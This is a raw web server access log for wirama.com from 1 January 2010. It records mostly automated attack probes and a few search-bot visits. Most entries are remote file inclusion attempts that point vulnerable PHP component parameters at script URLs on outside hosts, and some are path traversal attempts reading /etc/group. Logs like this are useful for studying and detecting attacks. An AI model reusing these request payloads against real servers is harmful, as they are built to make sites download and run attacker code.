89.185.231.103 - - [01/Jan/2010:08:05:20 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.185.231.103 - - [01/Jan/2010:08:05:23 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.185.231.103 - - [01/Jan/2010:08:05:42 -0800] "GET /logs/access_091101.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.53 - - [01/Jan/2010:08:07:14 -0800] "GET /_private/?M=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
207.46.199.196 - - [01/Jan/2010:08:08:18 -0800] "GET /_private/?M=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
64.151.247.1 - - [01/Jan/2010:08:13:28 -0800] "GET /_bot.php?master[currentskin]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:08:13:28 -0800] "GET /logs//_bot.php?master[currentskin]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:08:13:28 -0800] "GET /logs/access_091001.log%20%20//_bot.php?master[currentskin]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:08:13:33 -0800] "GET /_bot.php?master[currentskin]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:08:13:33 -0800] "GET /logs/access_091001.log//_bot.php?master[currentskin]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:08:13:33 -0800] "GET /logs//_bot.php?master[currentskin]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:08:14:12 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:08:14:12 -0800] "GET /logs/access_091031.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:08:14:12 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:08:16:01 -0800] "GET /logs//_bot.php?master[currentskin]=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:08:16:02 -0800] "GET /_bot.php?master[currentskin]=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:08:16:19 -0800] "GET //?_zb_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:08:16:19 -0800] "GET /logs/access_090501.log///?_zb_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:08:16:19 -0800] "GET /logs///?_zb_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 200 3804 "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:08:16:20 -0800] "GET //?_zb_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:08:16:20 -0800] "GET /logs/access_090501.log///?_zb_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:08:16:20 -0800] "GET /logs///?_zb_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 200 3804 "-" "Mozilla/5.0" "wirama.com"
89.185.231.103 - - [01/Jan/2010:08:16:25 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.185.231.103 - - [01/Jan/2010:08:16:25 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:08:16:29 -0800] "GET /logs/access_090501.log///?_zb_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:08:16:29 -0800] "GET //?_zb_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:08:16:29 -0800] "GET /logs///?_zb_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 200 3804 "-" "Mozilla/5.0" "wirama.com"
89.185.231.103 - - [01/Jan/2010:08:16:30 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:08:16:33 -0800] "GET /logs/access_090501.log///?_zb_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:08:16:33 -0800] "GET //?_zb_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:08:16:33 -0800] "GET /logs///?_zb_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 200 3804 "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:08:16:42 -0800] "GET /logs///?_zb_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 3804 "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:08:16:42 -0800] "GET /logs/access_090501.log///?_zb_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:08:16:42 -0800] "GET //?_zb_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
89.185.231.103 - - [01/Jan/2010:08:16:57 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.185.231.103 - - [01/Jan/2010:08:16:57 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:08:16:58 -0800] "GET /logs/access_091001.log//_bot.php?master[currentskin]=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:08:16:59 -0800] "GET /logs///?_zb_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 3804 "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:08:16:59 -0800] "GET //?_zb_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:08:16:59 -0800] "GET /logs/access_090501.log///?_zb_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:08:16:59 -0800] "GET //?_zb_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:08:16:59 -0800] "GET /logs/access_090501.log///?_zb_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:08:16:59 -0800] "GET /logs///?_zb_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 3804 "-" "Mozilla/5.0" "wirama.com"
89.185.231.103 - - [01/Jan/2010:08:17:04 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.185.231.103 - - [01/Jan/2010:08:17:11 -0800] "GET /logs/access_091101.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:08:17:35 -0800] "GET /logs/access_091001.log%20//_bot.php?master[currentskin]=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:08:17:44 -0800] "GET /logs/access_090501.log///?_zb_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:08:17:44 -0800] "GET //?_zb_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:08:17:44 -0800] "GET /logs///?_zb_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 3804 "-" "Mozilla/5.0" "wirama.com"
66.98.216.61 - - [01/Jan/2010:08:25:21 -0800] "GET /active/components/xmlrpc/client.php?c[components]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
66.98.216.61 - - [01/Jan/2010:08:25:21 -0800] "GET /active/components/xmlrpc/client.php?c[components]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "wirama.com"
211.232.85.247 - - [01/Jan/2010:08:34:25 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:08:34:25 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:08:34:42 -0800] "GET /logs/access_091031.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.93.208.12 - - [01/Jan/2010:08:38:53 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [01/Jan/2010:08:38:53 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [01/Jan/2010:08:38:54 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [01/Jan/2010:08:38:55 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [01/Jan/2010:08:38:55 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [01/Jan/2010:08:38:55 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [01/Jan/2010:08:39:29 -0800] "GET /logs/access_091101.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [01/Jan/2010:08:39:51 -0800] "GET /logs/access_091101.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.232.85.247 - - [01/Jan/2010:08:41:56 -0800] "GET /logs/access_091101.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:08:41:56 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:08:41:56 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.250.255.243 - - [01/Jan/2010:08:45:22 -0800] "GET /pr01.htm HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:51:04 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:51:04 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:51:05 -0800] "GET /logs/access_090329.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:51:07 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:51:07 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:51:07 -0800] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:52:09 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:52:09 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:52:09 -0800] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:53:13 -0800] "GET /logs/access_090330.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:08:53:22 -0800] "GET /logs/access_091101.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.232.85.247 - - [01/Jan/2010:08:53:22 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:08:54:08 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:08:54:53 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.55.15.194 - - [01/Jan/2010:08:59:47 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.55.15.194 - - [01/Jan/2010:08:59:47 -0800] "GET /logs/access_091101.log//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.55.15.194 - - [01/Jan/2010:08:59:47 -0800] "GET /skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.55.15.194 - - [01/Jan/2010:09:00:31 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:16 -0800] "GET /logs/access_090329.log%20%20////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:16 -0800] "GET /logs/access_090329.log%20%20////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:16 -0800] "GET ///?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:16 -0800] "GET ///?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:16 -0800] "GET /logs////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 200 3805 "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:16 -0800] "GET /logs////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 200 3805 "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:23 -0800] "GET /logs/access_090301.log////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:23 -0800] "GET /logs/access_090301.log////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:23 -0800] "GET /logs/access_090329.log////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:23 -0800] "GET ///?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:23 -0800] "GET ///?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:23 -0800] "GET /logs/access_090329.log////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:23 -0800] "GET /logs////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 200 3805 "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:02:23 -0800] "GET /logs////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 200 3805 "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:03:50 -0800] "GET /logs/access_090329.log////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:09:03:50 -0800] "GET /logs////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 200 3805 "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:09:03:50 -0800] "GET ///?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:09:03:58 -0800] "GET /logs/access_090329.log////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:09:03:58 -0800] "GET ///?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:09:03:58 -0800] "GET /logs////?path_to_root=http://www.realtyicons.com/1.txt? HTTP/1.1" 200 3805 "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:09:05:38 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:09:05:38 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:09:05:38 -0800] "GET /logs/access_091101.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.55.15.194 - - [01/Jan/2010:09:07:57 -0800] "GET /skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.55.15.194 - - [01/Jan/2010:09:07:57 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.55.15.194 - - [01/Jan/2010:09:07:57 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
216.155.151.198 - - [01/Jan/2010:09:10:26 -0800] "GET /logs/access_090331.log//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
216.155.151.198 - - [01/Jan/2010:09:10:26 -0800] "GET /login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
216.155.151.198 - - [01/Jan/2010:09:10:26 -0800] "GET /logs//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:09:10:29 -0800] "GET /logs/access_090331.log//login.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:09:10:29 -0800] "GET /logs//login.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:09:10:29 -0800] "GET /login.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
216.155.151.198 - - [01/Jan/2010:09:10:46 -0800] "GET /logs/access_090601.log//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.55.15.194 - - [01/Jan/2010:09:11:08 -0800] "GET /skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.55.15.194 - - [01/Jan/2010:09:11:13 -0800] "GET /logs/access_090330.log//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.55.15.194 - - [01/Jan/2010:09:11:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
